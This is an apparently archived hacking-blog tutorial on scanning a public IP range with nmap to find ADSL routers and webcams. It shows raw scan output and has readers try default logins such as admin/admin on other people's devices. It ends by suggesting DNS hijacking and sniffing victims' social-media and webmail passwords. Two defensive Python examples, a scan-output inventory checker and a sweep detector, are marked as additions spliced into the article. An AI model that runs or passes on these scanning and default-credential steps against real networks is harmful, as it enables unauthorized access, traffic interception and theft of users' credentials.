http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/ (8/3/15, 12:26 AM)

Exploit ADSL router using NMAP • HaCoder

May 10, 2023


By Ibrahim - Aug 1, 2015

Exploit ADSL router using NMAP

Search for Vulnerable Routers


Now that we have NMAP sorted, we are going to run the following command to scan for ADSL modem routers based on their banner on port 80 to start our ADSL router hack. All you need is to pick an IP range. I've used an example below using the 101.53.64.1/24 range.

Search from Linux using command Line

In Linux run the following command:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In Windows or Mac open NMAP and copy paste this line:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Once it finds the results, search for the word 'open' to narrow down the results. A typical Linux NMAP command would return output lines like the ones below (and of course I've changed the IP details):


Host: 101.53.64.3 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/

Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/

Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.31 () Ports: 80/open/tcp//http?///

Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.35 () Ports: 80/open/tcp//http?///

Host: 101.53.64.37 () Ports: 80/open/tcp//http?///

Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/

Host: 101.53.64.52 () Ports: 80/open/tcp//http?///

Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/

Host: 101.53.64.58 () Ports: 80/open/tcp//http?///

Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/

Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/

Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/

Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/

Host: 101.53.64.107 () Ports: 80/open/tcp//http?///

Host: 101.53.64.112 () Ports: 80/open/tcp//http?///

Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/

Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/

Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/

Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/

Host: 101.53.64.186 () Ports: 80/open/tcp//http?///

Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/

Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///

Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
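The same -oG output is what an administrator gets when scanning their own address space, and grep alone discards the banner fields. The following added example (not from the original article) parses the grepable format and lists open listeners that are missing from an approved inventory; the sample lines, the RFC 5737 addresses and the APPROVED set are constructed assumptions.

```python
import re

# Constructed sample in nmap grepable (-oG) format. Addresses are from the
# RFC 5737 documentation range; the banners are ones shown in the article.
SAMPLE = (
    "# constructed nmap -oG sample\n"
    "Host: 192.0.2.3 ()\tPorts: 80/open/tcp//tcpwrapped///\n"
    "Host: 192.0.2.4 ()\tPorts: 80/open/tcp//http//micro_httpd/\n"
    "Host: 192.0.2.20 ()\tStatus: Up\n"
    "Host: 192.0.2.73 ()\tPorts: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/\n"
    "Host: 192.0.2.79 ()\tPorts: 80/open/tcp//http//Apache httpd/\n"
    "Host: 192.0.2.31 ()\tPorts: 80/open/tcp//http?///, 443/closed/tcp//https///\n"
)
# Hypothetical inventory of listeners the owner intends to expose.
APPROVED = {("192.0.2.79", 80)}

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+([^\t]*)")

def parse_grepable(text):
    """Return one dict per port entry found in -oG output."""
    records = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:                      # comments, "Status:" lines, blanks
            continue
        ip, ports = m.groups()
        # Entries are comma-separated; split only where a new port number starts.
        for entry in re.split(r",\s+(?=\d+/)", ports):
            f = entry.strip().split("/")
            if len(f) < 7 or not f[0].isdigit():
                continue
            # Field order: port/state/protocol/owner/service/rpcinfo/version/
            records.append({"ip": ip, "port": int(f[0]), "state": f[1],
                            "service": f[4], "version": f[6]})
    return records

def unapproved_open(records, approved):
    """Open listeners (tcpwrapped included) that are not in the inventory."""
    return [(r["ip"], r["port"], r["service"], r["version"])
            for r in records
            if r["state"] == "open" and (r["ip"], r["port"]) not in approved]

if __name__ == "__main__":
    for finding in unapproved_open(parse_grepable(SAMPLE), APPROVED):
        print(finding)
```

Hosts reported as tcpwrapped stay in the result because the port still accepted a connection, which is worth reviewing on a perimeter.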


This was taking a long time (we are, after all, trying to scan 256 hosts using the command above). Being impatient, I wanted to check whether my Kali Linux was actually doing anything for the ADSL router hack. I used the following command in a separate terminal to monitor what my PC was doing… it was doing a lot…

tcpdump -ni eth0

That's a lot of connected hosts with TCP port 80 open. Some are marked 'tcpwrapped', which means the TCP handshake completed but the host closed the connection before sending any data, so they are possibly not accessible.
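Seen from the receiving network, the sweep above is one source sending SYNs to port 80 on many different hosts within seconds. The following added example (not from the original article) flags that pattern in tcpdump -n text output; the capture lines, the 10-second window and the threshold of 20 hosts are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches a bare SYN (Flags [S]) in tcpdump -n text output; SYN-ACK is [S.].
SYN_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\d+(?:\.\d+){3})\.\d+ > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[S\],")

def constructed_capture():
    """Constructed lines: one sweeping source and one ordinary client."""
    lines = []
    for i in range(1, 61):             # 60 distinct hosts in well under a second
        lines.append(f"12:26:01.{i * 1000:06d} IP 198.51.100.7.{40000 + i} > "
                     f"192.0.2.{i}.80: Flags [S], seq 1, win 1024, length 0")
    for i in range(5):                 # a client revisiting a single server
        lines.append(f"12:26:0{2 + i}.000000 IP 203.0.113.5.{50000 + i} > "
                     f"192.0.2.79.80: Flags [S], seq 1, win 65535, length 0")
    lines.append("12:26:03.000000 IP 192.0.2.79.80 > 203.0.113.5.50000: "
                 "Flags [S.], seq 1, ack 2, win 65535, length 0")
    return lines

def detect_sweeps(lines, port=80, window=timedelta(seconds=10), threshold=20):
    """Map each source to the peak number of distinct hosts it sent SYNs to
    on `port` within `window`, for sources reaching `threshold`.
    Timestamps carry no date, so a capture crossing midnight needs splitting."""
    recent = defaultdict(deque)        # src -> deque of (timestamp, dst)
    flagged = {}
    for line in lines:
        m = SYN_RE.match(line)
        if not m or int(m["dport"]) != port:
            continue
        ts = datetime.strptime(m["ts"], "%H:%M:%S.%f")
        q = recent[m["src"]]
        q.append((ts, m["dst"]))
        while ts - q[0][0] > window:   # drop SYNs older than the window
            q.popleft()
        distinct = len({dst for _, dst in q})
        if distinct >= threshold:
            flagged[m["src"]] = max(flagged.get(m["src"], 0), distinct)
    return flagged

if __name__ == "__main__":
    print(detect_sweeps(constructed_capture()))
```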

Search from Windows, Mac or Linux using GUI – NMAP or Zenmap


Assuming you got the NMAP installation sorted, you can now open NMAP (in Kali Linux or a similar Linux distro, you can use Zenmap, which is the cross-platform GUI version of NMAP). Copy and paste the following line into the Command field:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -

Another version of this command gives the targets as an address range instead of a subnet mask (note that /26 covers 64 addresses, while 1-255 covers the whole last octet):

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Press the Scan button and wait a few minutes until the scan is over.


Once you have some results, you need to find the devices with open ports. On the search results page:

1. Click on Services Button

2. Click on http Service

3. Click on Ports/Hosts TAB (Twice to sort them by status)

As you can see, I’ve found a few devices with open http port 80.


It is quite amazing how many devices have ports open facing the outer DMZ.

Access Management Webpage

Pick one at a time. For example try this:

http://101.53.64.3

http://101.53.64.4


http://101.53.64.129

You get the idea. If it opens a webpage asking for a username and password, try one of the following combinations:

admin/admin
admin/password
admin/pass
admin/secret

If you can find the router's make and model number, you can find the exact username and password from this webpage: http://portforward.com/default_username_password/

Before we finish up, I am sure you were already impatient like me, as a lot of the routers had 'tcpwrapped' on them, which was actually stopping us from accessing the web management interface for the ADSL router hack. The following command will exclude those devices from our search. I've also expanded my search to a broader range using a slightly different subnet mask.

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using a /22 subnet mask with 2 specific filters: I am looking for the word 'open' and excluding 'tcpwrapped' from my output. As you can see, I still get a lot of output.


Conclusion

You'll be surprised how many have default usernames and passwords enabled. Once you get access to the router, you can do a lot more, like DNS hijacking or stealing usernames and passwords (for example, social media credentials for Facebook, Twitter, webmail, etc.) using tcpdump/snoop on the router's interface, and much more using the ADSL router hack.


Ibrahim

http://www.hacoder.com/

Ibrahim Husic is a young Information Systems Security Engineer. He started with penetration testing when he was 16 years old. It all started with Kali Linux and Metasploit. He has been in the newspaper twice for hacking. In his free time he investigates security holes and solves them.
